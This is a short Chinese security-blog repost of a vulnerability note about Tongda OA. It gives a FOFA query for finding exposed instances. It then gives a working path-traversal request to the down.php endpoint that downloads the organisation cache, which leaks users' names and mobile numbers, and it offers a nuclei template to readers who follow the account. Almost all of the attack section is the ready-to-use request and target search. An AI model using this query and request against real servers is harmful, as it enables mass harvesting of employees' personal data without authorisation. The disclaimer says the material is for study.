通达OA down 信息泄露

admin 2023年12月2日03:11:40评论41 views字数 461阅读1分32秒阅读模式
通达OA down 信息泄露

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习交流使用,如若非法他用,与平台和本文作者无关,需自行负责!

00

漏洞概述

通达OA down 信息泄露

通达OA down 接口可下载用户联系人信息。

01

空间搜索语法

通达OA down 信息泄露

fofa

app="TDXK-通达OA"

通达OA down 信息泄露

02

利用过程

通达OA down 信息泄露

登录界面

通达OA down 信息泄露

down接口可下载用户联系人信息
http://xxxxx/inc/package/down.php?id=../../../cache/org

漏洞存在响应包如下。

通达OA down 信息泄露

泄露用户姓名及手机号信息。

通达OA down 信息泄露

03

nuclei

通达OA down 信息泄露

通达OA down 信息泄露

获取脚本关注本公众号后发送:Tongda1
原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创

关注我们

原文始发于微信公众号(天澜实验室):通达OA down 信息泄露

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月2日03:11:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通达OA down 信息泄露http://cn-sec.com/archives/2257815.html

发表评论

匿名网友 填写信息